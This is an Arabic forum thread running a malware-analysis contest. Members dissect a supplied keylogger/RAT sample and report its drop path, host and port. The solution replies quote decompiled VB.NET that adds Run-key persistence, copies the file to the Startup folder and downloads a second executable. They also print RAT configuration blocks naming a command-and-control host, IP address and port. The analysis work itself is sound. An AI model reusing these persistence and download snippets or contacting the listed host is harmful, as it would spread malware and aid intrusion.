• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

  • بادئ الموضوع بادئ الموضوع m0d!s@r7@n
  • تاريخ البدء تاريخ البدء
  • المشاهدات 2,098
الحالة
مغلق و غير مفتوح للمزيد من الردود.

m0d!s@r7@n

عضو شرف (خبير فحص الملفات)( خبراء زيزووم)
★★ نجم المنتدى ★★
عضوية موثوقة ✔️
كبار الشخصيات
إنضم
24 مارس 2013
المشاركات
3,452
مستوى التفاعل
15,533
النقاط
1,220
الإقامة
مصر
غير متصل
OTHaBZC.gif



►◄: أحبابنا ,أعضاء المنتدى الأعزاء :►◄

أسعد الله يومكم بكل خير ووفقكم لما يحب ويرضى وأسأل الله أن يمن علينا بالخير واليمن والبركة

يـــســـعـــدنــا أنـ نــقــدمـ لــكــمـ


التحدي الثالث من







vtIyecs.gif




والتي تهدف الى إستثمار الجهود المبذوله من الإخوه الأعضاء بالقسم في مزيد من العطاء والبذل

في جو تنافسي خلاق والعمل علي إظهار مواهبكم وتطويرها



يرجى الإطلاع علي شروط المسابقه قبل الإشتراك









يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي



k3IpSvG.gif


▲▼ المطــــلوب ▼▲

جلب بيانات الملف التاليه

- مســـار نزول السيرفر

- البـورت والهـوست للسيرفر


تنبيه

بيانات الملف حقيقيه



لتحميل ملف المسابقه






يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي








يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي








▲▼ الباســـورد ▼▲

[hide]keylogger
[/hide]

k3IpSvG.gif

►► طريقة تسليم بيانات ملف المسابقه ◄◄


- من يصل للبيانات الصحيحه يراسل أحد الأعضاء المسؤلين عن المسابقه

من أجل الحلول أو الإستفسارات








يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


ـــــــــــــــــــــــــــــ
ــــــــــــــــ


نرجوا الإلتزام من الجميع

ومن يخالف شروط وقوانين المسابقه

سيتم إخراجه من المسابقه نهائياً

وفي حالة تكرار المخالفة لـ 3 مرات سيتم حرمانه من الموسم التالي


k3IpSvG.gif


شكر واجب لاخينا black007 المبدع صاحب ملف المسابقه

لاختنا الفاضله روايدا صاحبه تصميم وتنسيق الموضوع

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
 

التعديل الأخير:
انتهي وقت المسابقه وسيتم اعلان الفائزين في هذا التحدي
 
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


الازرار التي تؤدي لملفات الاثصال المرادة من المسابقة هي :


o4ifgwK.png


6XDCpsq.png


ننتظر قليلا فيظهر بجدار الحماية الملفين :

[hide]
vmB6WJD.png
[/hide]

[hide]
e09FA2b.png
[/hide]

و يتصلون بنفس الجهة :

[hide]
Mo9sfe1.png
[/hide]

و الهوست بالاداة التي يستخدمها الجميع :



[hide]
M8NvVDp.png
[/hide]


------------------------------------
 
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


اولا نعمل دمب للملف Contest .exe
بالMegadumber
ونحلل البرنامج الناتج بالريفليكتور
نلاحظ التالي
مسار النزول
مجلد AppData باسم SVCHOST.exe

DzKHZ7.webp


بعد ذلك نفك الملفAnti uلأنه يحتوي على حمايتين
مرتين بـ De4Dot
ثم نثبته بـ Universal Fixer
بعد ذلك نفتح الريفليكتور

نلاحظ وجود أضافة ستارت أب

Public Shared Sub AStartup(ByVal Name As String, ByVal Path As String)
Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True).SetValue(RegistryValueKind.String)
End Sub

وتحميل ملف لايحمل من أصله

==============

كما يقوم الملف بنسخ نفسه في مجلد الستارت اب

Dim folderPath As String = Environment.GetFolderPath(SpecialFolder.Startup)

File.Copy(Application.ExecutablePath, (StartupKey & ".exe"))

وفتح صفحة بيست بن pastebin
هذا المحتوى يظهر للاعضاء المسجلين فقط:

Me.WebBrowser1.Navigate("
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
")
AboM

ندخل على Evil Osama في لكلاس mPE
ونشغل بلاجن الريفليكسل
نلاحظ وجود أكواد التخطي
1.webp


أبحث عن أسم الاداة في بلاجن الريفلكسل

2.webp


كليك يمين وأختار EDit وغير لأسم كما تشاء
3.webp

========
في Timer3
MyProject.Computer.Network.DownloadFile(Me.OS, (MyProject.Computer.FileSystem.SpecialDirectories.Temp & "\Updat.exe"))
لو لاحظت معي هنا
الرابط الذي سيحمل منه الملف هو المتغير النصي os
للحصول عليه نضع الكود
Msgbox(os)
ليظهر لنا رابط التحميل
===================
الآن كليك يمين على المديول نفسها واختر Reflex وأختر Save as

4.webp

\

يظهر لنا صندوق الرسالة الذي وضعناه
os قيمته لاشيئ
اذا الملف خدعه وعندك شرط ان ساوت قيمة os ="" يتم تجاهل تحميل الملف
ياخسارة على الملف كان ممتع:(

====================
الآن السيرفر الحقيقي

الآول
blogger.exe

Shared Sub New()

[hide]W.h = "bitdefenderawards.serveblog.net"
[/hide]
W.port = "80"
W.path = "Temp"
W.exe = "Svchost.exe"
W.Name = "Victim"
W.inst = "False"
W.pro = "True"
W.Y = "/B|L\"
W.F = New Computer
W.C = New TCP
W.run = False
W.run1 = False
W.actv = ""
End Sub

الهوست

[hide]bitdefenderawards.serveblog.net
[/hide]

البورت
80
مسار النزول
%Temp%

إضافة ريجستري
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", W.exe


الثاني

Shared Sub New()
OK.SPR = Conversions.ToBoolean("false")
OK.b = New Byte(5121 - 1) {}
OK.BD = Conversions.ToBoolean("False")
OK.C = Nothing
OK.Cn = False
OK.DR = "TEMP"
OK.EXE = "AFH.exe"
OK.F = New Computer

[hide]OK.H = "bitdefenderawards.serveblog.net"
[/hide]
OK.Idr = Conversions.ToBoolean("true")
OK.IsF = Conversions.ToBoolean("false")
OK.Isu = Conversions.ToBoolean("false")
OK.kq = Nothing
OK.lastcap = ""
OK.LO = New FileInfo(Assembly.GetEntryAssembly.Location)
OK.MeM = New MemoryStream
OK.MT = Nothing
OK.P = "80"
OK.PLG = Nothing
OK.RG = "23f0e3bce589df29a3e6f3e8879b41c1"
OK.VN = "SGFjS2Vk"
OK.VR = "0.7d crack by AFH"
OK.Y = "|'|'|"
End Sub

الهوست:

[hide]bitdefenderawards.serveblog.net
[/hide]
البورت :80
مسار التوليد:
%TEMP%
فكهم كأي تشفيرة
1 أولا نفك الملف مرتين باستخدام اداة De4dot مرتين متتليتين لاحتوائه على حمايتين
2 ثانيا نفك الخوارزمية بالموقع

أو نشغله ونعملة Dumb بالMegadumber وريح دماغك
أبحث عن عمليته وكلك يمين .net Dumb
ستجد مجلد بأسم Dumbs أفتحه
تسجد ملف بأسم W.exe
أفتحه بالدوت نت ريفليكتور
ستجد البيانات في أساس الكلاس w
.occtor
الثاني ستجد ملف باسم
bitdefenderawards.exe
أفتحه بالريفليكتور عادي خالص
ستجد البيانات في اساس الكلاس ok
 
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(شرح رائع ومنسق ويستحق ان يكون موضوع)


البيانات المطلوبة :-

الملفات الملغومة هى :
Temp box
PicturesREP

==

البيانات المتعلقة بالملف Temp box
الاى بى[hide] 197.162.44.254 [/hide]
والبورت 80
مسار النزول C:\Users\User Name\AppData\Local
الهوست [hide]bitdefenderawards.serveblog.net[/hide]
==

البيانات المتعلقة بالملف PicturesREP
الاى بى[hide] 197.162.44.254 [/hide]
والبورت 80
مسار النزول C:\Users\ User Name
الهوست[hide] bitdefenderawards.serveblog.net[/hide]

==

الخدعة الموجودة بالملف ( نسيت اذكرها بالفيديو )
يجب الضغط على Key 4 مرتين حتى يتم إنشاء اول ملف Temp box
ويجب الضغط على Key 6 ثلاث مرات حتى يتم إنشاء ثانى ملفPicturesREP

==
الشــرح
[hide]
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]

( اعتذر على حجم الفيديو الكبير .. رغم انى استخدمت برنامج Instant Demo والشرح بصيغة SWF .. حاولت ضغطه الى اقصى حد ممكن لكن لم ينجح الأمر .. لذا تم تقسيمه الى 3 اجزاء . )

(اضفت لكم هذا الشرح الاول لاخينا عمرو لمزيد من الفائده)
[hide]
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى